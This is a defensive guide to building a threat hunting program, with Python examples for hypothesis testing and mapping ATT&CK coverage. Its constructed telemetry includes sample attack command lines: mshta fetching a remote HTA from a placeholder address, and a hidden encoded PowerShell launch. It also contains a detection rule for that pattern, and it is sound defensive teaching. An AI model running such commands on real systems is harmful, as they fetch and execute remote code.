How to Build a Threat Hunting Program: A Practitioner Guide
Alert-driven security operations are reactive by design: an analyst investigates an alert after something has already happened. Threat hunting inverts this model. Hunters proactively search the environment for attacker behavior that has not triggered an alert, and in particular for techniques designed never to trigger one. The working assumption is that a capable adversary may already be inside the environment, moving quietly, and that hunting on attacker TTPs rather than indicator signatures is what finds them. This guide covers how to stand up a threat hunting program, what data and tooling it requires, and how to structure and measure the effort.
Hunting Maturity: Where to Start
Hunting programs exist on a maturity spectrum. Attempting advanced analytics-driven hunting without the foundational data infrastructure produces wasted effort. The Hunting Maturity Model (HMM), described by David J. Bianco, provides a framework for assessing current capability and prioritizing investments.
HMM Level 0 — Initial (no hunting)
Fully dependent on automated alerts. No proactive search capability. Security posture: reactive. Data: whatever the SIEM receives. Starting point for most organizations.
HMM Level 1 — Minimal (IOC-based hunting)
Searching for known indicators: IP addresses, domain names, file hashes from threat intelligence feeds. Better than nothing, but IOC-based hunting is trivially evaded by attackers who cycle infrastructure.
HMM Level 2 — Procedural (TTP-based hunting)
Hunting based on attacker techniques from MITRE ATT&CK rather than indicators. Searches for behavioral patterns: unusual parent-child process relationships, specific registry key modifications, suspicious PowerShell execution patterns. More durable than IOC hunting — TTPs change slowly.
HMM Level 3 — Innovative (hypothesis-driven hunting)
Forming and testing novel hypotheses about attacker behavior based on threat intelligence, environmental knowledge, and analytical reasoning. Produces new detection logic rather than consuming existing playbooks. Requires senior analyst capability.
HMM Level 4 — Leading (automated hunting)
Machine learning models identify statistical anomalies that humans investigate. Hypothesis generation becomes partially automated. Requires significant data science investment on top of mature hunting infrastructure.
Data Requirements: The Hunting Foundation
Threat hunting is only as good as the data available to search. Before investing in hunters, invest in logging. The most common hunting program failure mode is hunters who cannot find what they are looking for because the relevant data was never collected.
Process execution telemetry
Full process execution history with command lines, parent-child relationships, and hashes is the single most valuable hunting data source. Windows: Sysmon Event ID 1 (process creation, which carries the command line, parent process and hashes), supplemented by IDs 3 (network connection), 10 (process access), 11 (file create) and 13 (registry value set), or EDR process telemetry. Linux: auditd execve records, eBPF-based tooling, or EDR process events. Without this, most TTP-based hunting is impossible.
Network flow data
NetFlow or equivalent (IPFIX, sFlow) for all significant network segments. DNS query logs from all internal resolvers. HTTP/HTTPS proxy logs. These enable hunting for C2 communication, lateral movement, and data exfiltration, the attack phases that happen on the network.
Authentication logs
Windows Security event logs (4624, 4625, 4648, 4768, 4769, 4776) and Active Directory logs are essential for hunting credential-based attacks, lateral movement, and privilege escalation. Cloud identity logs (Entra ID sign-in logs, AWS CloudTrail) are equally essential in hybrid environments.
Endpoint telemetry retention
Hunters need history. An adversary with a 30-day dwell time requires at least 90 days of searchable endpoint telemetry to reconstruct the attack chain, because the hunt usually starts well after the intrusion began and must reach back past initial access. Most EDRs retain raw telemetry for 7-30 days by default; configure extended retention or ship the data to a SIEM or data lake.
Cloud and SaaS audit logs
Adversaries who obtain cloud credentials operate in SaaS applications and cloud management planes, where no endpoint agent sees them. AWS CloudTrail, Azure Activity Logs, Google Cloud Audit Logs, and the Microsoft 365 Unified Audit Log are required data sources for any organization with a significant cloud footprint.
The Hunting Methodology: Hypothesis-Driven Hunting
Hypothesis-driven hunting is the most mature and effective hunting methodology. A hypothesis is a testable statement about attacker behavior: 'If an attacker is using living-off-the-land binaries for execution in this environment, we would expect to see mshta.exe launching remote HTA files, or wscript.exe and cscript.exe running scripts, from unexpected parent processes such as Office applications.' The hunt tests the hypothesis by searching the data for evidence of that behavior.
Step 1 — Hypothesis formation
Hypotheses come from: MITRE ATT&CK technique mappings to relevant threat actors, current threat intelligence about active campaigns, gap analysis of existing detection coverage (what are we not alerting on?), environmental knowledge (what are our critical assets, what would an attacker target?), and recent incidents or near-misses. Write the hypothesis explicitly before searching.
Step 2 — Data collection and scoping
Identify which data sources are relevant to the hypothesis. Scope the hunt to a manageable time window and asset set initially; expand if initial scope yields interesting findings. Undefined scope leads to indefinite hunts that produce no output.
Step 3 — Investigation and analysis
Execute queries against the data. For TTP-based hunts, this means querying for the specific behavioral patterns the technique produces. Compare findings against a baseline: is this process execution pattern normal for this environment? Stack counting (frequency analysis) of process parent-child pairs, network connection frequencies, and user behavior patterns surfaces anomalies; the rarest values are usually the ones worth an analyst's time.
Step 4 — Finding classification
Classify findings as: True Positive (active threat), Benign (legitimate activity, possibly misconfigured or unusual), or Gap (no data, cannot determine). True positives escalate to incident response. Benign findings inform future hunting (reduce noise). Gaps identify data collection improvements.
Step 5 — Output creation
Every completed hunt should produce output: a new detection rule, an updated playbook, a data collection improvement, or documented environmental baseline knowledge. Hunts that produce no lasting artifact waste the investment. This is the mechanism by which hunting improves the broader security program over time.
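The five steps above carried through in code, as an added example that is not from the original page. The records are constructed to look like Sysmon Event ID 1 fields but are fabricated; the host names, the known-benign baseline and the 203.0.113.10 address (a documentation range) are assumptions. Beyond the page's three finding classes it keeps a fourth, review, for rare parent-child pairs that match no other signal and need an analyst decision, and it emits the hunt's lasting output as a Sigma-style rule dict plus a data-gap note.

```python
from collections import Counter

# Living-off-the-land script hosts the hypothesis is about.
LOLBINS = {"mshta.exe", "wscript.exe", "cscript.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# Parent/child pairs documented as benign by earlier hunts (assumed baseline).
KNOWN_BENIGN = {("explorer.exe", "wscript.exe")}

# Constructed telemetry shaped like Sysmon Event ID 1 fields; not real data.
# A helpdesk login script makes explorer.exe -> wscript.exe common fleet-wide,
# ws-07 shows winword.exe -> mshta.exe pulling a remote HTA, ws-09 has a record
# with no parent (collection gap), and one ws-07 event predates the hunt window.
EVENTS = [
    {"ts": "2024-05-01T08:01:00Z", "host": "ws-01", "parent": "explorer.exe", "image": "wscript.exe", "cmd": r"wscript.exe C:\IT\login.vbs"},
    {"ts": "2024-05-01T08:02:00Z", "host": "ws-02", "parent": "explorer.exe", "image": "wscript.exe", "cmd": r"wscript.exe C:\IT\login.vbs"},
    {"ts": "2024-05-01T08:03:00Z", "host": "ws-03", "parent": "explorer.exe", "image": "wscript.exe", "cmd": r"wscript.exe C:\IT\login.vbs"},
    {"ts": "2024-05-01T08:04:00Z", "host": "ws-04", "parent": "explorer.exe", "image": "wscript.exe", "cmd": r"wscript.exe C:\IT\login.vbs"},
    {"ts": "2024-05-01T09:00:00Z", "host": "ws-01", "parent": "explorer.exe", "image": "chrome.exe", "cmd": "chrome.exe"},
    {"ts": "2024-05-02T14:12:00Z", "host": "ws-07", "parent": "winword.exe", "image": "mshta.exe", "cmd": "mshta.exe http://203.0.113.10/x.hta"},
    {"ts": "2024-05-02T14:13:00Z", "host": "ws-07", "parent": "mshta.exe", "image": "powershell.exe", "cmd": "powershell.exe -nop -w hidden -enc AAAA"},
    {"ts": "2024-05-03T10:00:00Z", "host": "ws-09", "parent": "", "image": "cscript.exe", "cmd": "cscript.exe"},
    {"ts": "2024-05-04T11:00:00Z", "host": "ws-05", "parent": "cmd.exe", "image": "cscript.exe", "cmd": r"cscript.exe //nologo C:\temp\inv.vbs"},
    {"ts": "2024-04-20T10:00:00Z", "host": "ws-07", "parent": "winword.exe", "image": "mshta.exe", "cmd": "mshta.exe http://203.0.113.10/x.hta"},
]

def scope(events, start, end, hosts=None):
    """Step 2: bound the hunt to a time window and optional host set.
    Timestamps are ISO-8601 UTC strings, so lexical comparison is chronological."""
    return [e for e in events
            if start <= e["ts"] < end and (hosts is None or e["host"] in hosts)]

def candidates(events):
    """Step 3a: the hypothesis as a query over process-creation records."""
    return [e for e in events if e["image"].lower() in LOLBINS]

def pair_counts(events):
    """Step 3b: stack-count every (parent, image) pair in scope. The rarest
    pairs are the baseline deviations worth an analyst's time."""
    return Counter((e["parent"].lower(), e["image"].lower()) for e in events)

def classify(ev, baseline, common_threshold=3):
    """Step 4: true_positive / benign / gap, plus review for rare pairs that
    carry no other signal and need an analyst decision."""
    if not ev["parent"]:
        return "gap"            # no lineage recorded: fix collection, cannot decide
    pair = (ev["parent"].lower(), ev["image"].lower())
    if pair in KNOWN_BENIGN or baseline[pair] >= common_threshold:
        return "benign"         # explained by documented baseline or fleet-wide prevalence
    cmd = ev["cmd"].lower()
    remote = "http://" in cmd or "https://" in cmd
    if pair[0] in OFFICE_PARENTS and remote:
        return "true_positive"  # rare pair + Office parent + remote payload: escalate to IR
    return "review"

def sigma_rule():
    """Step 5: the lasting artifact, a Sigma-style rule (dict form; dump as YAML)."""
    return {
        "title": "Office application spawns mshta.exe with remote HTA",
        "status": "experimental",
        "logsource": {"product": "windows", "category": "process_creation"},
        "detection": {
            "selection": {
                "ParentImage|endswith": sorted("\\" + p for p in OFFICE_PARENTS),
                "Image|endswith": "\\mshta.exe",
                "CommandLine|contains": ["http://", "https://"],
            },
            "condition": "selection",
        },
        "tags": ["attack.defense_evasion", "attack.t1218.005"],
        "level": "high",
    }

def run_hunt(events, start, end, hosts=None):
    """Steps 2-5 end to end; returns findings by class and the hunt's outputs."""
    scoped = scope(events, start, end, hosts)
    baseline = pair_counts(scoped)
    findings = {"true_positive": [], "benign": [], "gap": [], "review": []}
    for ev in candidates(scoped):
        findings[classify(ev, baseline)].append(ev)
    outputs = []
    if findings["true_positive"]:
        outputs.append(sigma_rule())
    if findings["gap"]:
        outputs.append({"data_gap": "%d record(s) lack ParentImage; check Sysmon/EDR config"
                        % len(findings["gap"])})
    return findings, outputs

if __name__ == "__main__":
    findings, outputs = run_hunt(EVENTS, "2024-05-01", "2024-05-08")
    for cls, evs in findings.items():
        print(cls, [(e["host"], e["parent"], e["image"]) for e in evs])
    for out in outputs:
        print(out)
```

On this constructed fleet the four login-script launches fall out as benign, the winword.exe to mshta.exe chain on ws-07 is the true positive that yields the rule, the parentless cscript.exe record on ws-09 becomes a collection-improvement item, and the cmd.exe to cscript.exe launch on ws-05 stays in review for the analyst. The common_threshold and the known-benign set are the two knobs a real environment tunes over successive hunts.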
Hunting with MITRE ATT&CK
MITRE ATT&CK provides the most structured framework for TTP-based hunting. The Enterprise ATT&CK matrix covers 14 tactics and hundreds of techniques with detailed procedure examples, data source requirements, and detection suggestions.
Coverage mapping
Map your current detection rules against ATT&CK techniques to identify gaps — techniques with no current detection coverage. These gaps are the highest-priority hunting targets: adversaries using uncovered techniques are invisible to your automated detection.
Threat actor profiling
ATT&CK includes profiles of known threat actor groups with their commonly used techniques. Hunt for techniques used by threat actors relevant to your industry and threat model. A manufacturing company concerned about APT40 hunts differently than a financial institution focused on FIN7.
ATT&CK Navigator
ATT&CK Navigator is a free web-based tool for visualizing coverage against the ATT&CK matrix. Create layers showing which techniques are covered by detection rules, which have been hunted, and which remain gaps. This visualization communicates hunting prioritization to leadership and drives program planning.
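Coverage mapping and a Navigator layer in code, as an added example that is not from the original page or from MITRE. The rule-to-technique inventory, the actor technique set and the hunted set are constructed (the technique IDs are real Enterprise ATT&CK IDs, but no claim is made here about which actor uses them); the layer field names follow the Navigator 4.x layer format as I understand it and should be checked against the Navigator version you run.

```python
import json

# Constructed inventory: detection rule name -> ATT&CK technique IDs it covers.
# Rule names are hypothetical; the technique IDs are real Enterprise ATT&CK IDs.
DETECTION_RULES = {
    "Office application spawns script host": ["T1566.001", "T1059.005"],
    "Encoded or obfuscated PowerShell": ["T1059.001", "T1027"],
    "Non-system process opens LSASS": ["T1003.001"],
    "Burst of RC4 TGS requests (Kerberoasting)": ["T1558.003"],
}

# Constructed: techniques attributed to the actor group in scope. Take the real
# list from the group's ATT&CK page; this subset is illustrative only.
ACTOR_TECHNIQUES = [
    "T1566.001", "T1059.001", "T1003.001", "T1021.001",
    "T1047", "T1570", "T1558.003", "T1218.005",
]

# Techniques already covered by a completed hunt this cycle (assumed).
HUNTED = {"T1021.001"}

def covered_techniques(rules):
    """Every technique that at least one automated detection claims to cover."""
    return {tid for tids in rules.values() for tid in tids}

def coverage_gaps(actor_techniques, rules):
    """Actor techniques with no automated detection: invisible to the SOC today."""
    covered = covered_techniques(rules)
    return [t for t in actor_techniques if t not in covered]

def prioritized_hunts(actor_techniques, rules, hunted):
    """Hunt backlog order: never-hunted gaps first, then gaps that were hunted
    but still lack a detection (the hunt produced no rule; revisit the output step)."""
    gaps = coverage_gaps(actor_techniques, rules)
    return sorted(t for t in gaps if t not in hunted) + sorted(t for t in gaps if t in hunted)

def coverage_percent(actor_techniques, rules):
    """Share of relevant actor techniques with automated detection; the metric
    to track before and after each hunt cycle."""
    covered = covered_techniques(rules)
    hit = sum(1 for t in actor_techniques if t in covered)
    return round(100.0 * hit / len(actor_techniques), 1)

def navigator_layer(name, actor_techniques, rules, hunted):
    """Build an ATT&CK Navigator layer: score 2 = detection exists, 1 = hunted
    but no detection yet, 0 = gap. Field names follow the Navigator 4.x layer
    schema (assumed; confirm against the version you run)."""
    covered = covered_techniques(rules)
    techniques = []
    for t in actor_techniques:
        if t in covered:
            score, note = 2, "automated detection"
        elif t in hunted:
            score, note = 1, "hunted, no detection produced"
        else:
            score, note = 0, "gap: not detected, not hunted"
        techniques.append({"techniqueID": t, "score": score, "comment": note, "enabled": True})
    return {
        "name": name,
        "versions": {"attack": "14", "navigator": "4.9", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "Detection coverage versus actor techniques",
        "techniques": techniques,
        "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 2},
        "legendItems": [
            {"label": "gap", "color": "#ff6666"},
            {"label": "hunted only", "color": "#ffe766"},
            {"label": "detected", "color": "#8ec843"},
        ],
    }

if __name__ == "__main__":
    print("coverage: %.1f%%" % coverage_percent(ACTOR_TECHNIQUES, DETECTION_RULES))
    print("hunt backlog:", prioritized_hunts(ACTOR_TECHNIQUES, DETECTION_RULES, HUNTED))
    layer = navigator_layer("Actor coverage", ACTOR_TECHNIQUES, DETECTION_RULES, HUNTED)
    print(json.dumps(layer, indent=2))  # save and load via Navigator's Open Existing Layer
```

With the constructed inputs the coverage is 50% and the backlog opens with T1047, T1218.005 and T1570, the uncovered techniques nobody has hunted yet, ahead of T1021.001, which was hunted without producing a rule. Re-running this after each cycle gives the before/after coverage figure used in the metrics section and a layer file leadership can read without knowing the matrix.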
Technique-specific hunt playbooks
Develop documented hunt playbooks for high-priority ATT&CK techniques: the data sources required, the specific queries to run, what normal looks like, and what anomalies are suspicious. Documented playbooks allow junior hunters to execute established hunts consistently and senior hunters to focus on novel hypothesis development.
Tooling for Threat Hunters
Effective hunting requires tools that support interactive, iterative data exploration — different from SIEM alerting dashboards designed for alert triage.
Data platform for hunting queries
Hunters need a query interface with full-text search, field extraction, statistical aggregation, and time-series analysis. Splunk, Elastic, Microsoft Sentinel, and dedicated threat hunting platforms (Hunters.ai, Palo Alto Cortex XDR) all support hunting workflows. The key capability is ad-hoc query speed across months of data.
Timeline and process tree visualization
Process trees showing parent-child relationships and execution timelines are essential for understanding attack sequences. CrowdStrike's Falcon Investigate, SentinelOne's Deep Visibility, and Microsoft Defender's investigation graph provide this natively from their EDR telemetry.
YARA for malware artifact hunting
YARA rules match strings, byte patterns, and structural characteristics of files and memory. Hunters use YARA to retrospectively scan historical file system artifacts and memory dumps for indicators of specific malware families. VirusTotal's Retrohunt runs a YARA rule across its historical sample corpus, one of the largest malware collections available.
Velociraptor
Velociraptor is an open source DFIR and endpoint monitoring platform. It enables hunters to remotely collect specific artifacts (prefetch files, shimcache, MFT entries, memory strings) from endpoints at scale, supporting forensic hunting across large fleets without full memory dump collection.
Measuring Hunt Program Effectiveness
Hunting programs that cannot demonstrate value lose budget. The metrics that matter are outcomes, not activities.
Threats discovered
Count of true positive findings from hunts, categorized by severity. This is the primary value metric. A program that discovers zero threats after multiple hunt cycles should examine whether the hypothesis selection is surfacing high-probability scenarios or avoiding hard problems.
New detections created
Count of new detection rules added to the SIEM or EDR as a result of hunting. This is the compound value — hunting improvements persist in automated detection after the hunt concludes.
ATT&CK coverage improvement
Track the percentage of relevant ATT&CK techniques covered by automated detection before and after each hunt cycle. Coverage should increase as hunting converts gaps into detections.
Mean time to detect improvement
Compare MTTD for threat categories that have been actively hunted against those that have not. Hunted categories should show lower MTTD over time as hunting produces better detection logic.
The bottom line
Threat hunting is the proactive complement to reactive alert-driven security operations. It finds adversaries who have bypassed automated detection and converts hunting discoveries into permanent detection improvements. Starting with a clear maturity assessment, investing in the right data collection, and rigorously applying hypothesis-driven methodology produces measurable reduction in breach dwell time and continuous improvement in detection coverage. Every hunt should leave the program better than it started.
Frequently asked questions
What is threat hunting?
Threat hunting is the proactive search for attackers already present in an environment who have evaded automated detection. Unlike alert-driven SOC operations that respond to triggered rules, hunters form hypotheses about attacker behavior and actively search for evidence of that behavior in telemetry data — without waiting for an alert. The goal is to find threats before they achieve their objectives and to convert hunting findings into new automated detections.
How is threat hunting different from incident response?
Incident response is reactive: it starts after a threat is identified (typically via an alert). Threat hunting is proactive: it starts without a confirmed threat, searching for evidence that a threat may be present. A hunt may conclude with no findings (the hypothesis was not confirmed in this environment), identify a true positive that then initiates incident response, or identify detection gaps without active threats. They are complementary, not competing, functions.
What data sources are most important for threat hunting?
The highest-value hunting data sources are: (1) process execution telemetry with command lines and parent-child relationships (Sysmon or EDR), (2) DNS query logs from all internal resolvers, (3) Windows authentication events (4624, 4648, 4768, 4769), (4) network flow data, and (5) proxy/web gateway logs. Without detailed process execution telemetry, most TTP-based hunting is not possible.
How does MITRE ATT&CK support threat hunting?
ATT&CK provides a structured taxonomy of adversary techniques organized by tactic (what attackers are trying to achieve) and technique (how they achieve it). For hunting, ATT&CK is used to: identify detection gaps (which techniques have no current detection coverage), prioritize hunting targets (which gaps are most likely exploited by relevant threat actors), and write hypothesis statements (specific ATT&CK techniques predict specific observable behaviors). ATT&CK Navigator visualizes coverage gaps across the full matrix.
How many FTEs does a threat hunting program require?
A minimal hunting program can be operated by a single senior analyst dedicating 20-30% of their time to hunting alongside alert investigation duties. A dedicated hunt team typically starts with 2-3 analysts — one senior hunter to develop hypotheses and one or two mid-level analysts to execute established hunt playbooks. Large organizations with mature programs may have 5-10 dedicated hunters plus data engineering support. The bigger constraint is usually data infrastructure and tooling maturity, not headcount.
What is the Hunting Maturity Model?
The Hunting Maturity Model (HMM) describes five levels of hunting capability from Level 0 (no hunting, fully reactive) through Level 4 (automated anomaly detection with ML). Level 1 is IOC-based hunting (searching for known indicators). Level 2 is TTP-based hunting (searching for technique patterns). Level 3 is hypothesis-driven hunting (forming and testing novel hypotheses). Most programs should target Level 2-3 before investing in Level 4 ML capabilities, which require data science expertise and large labeled datasets.
Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.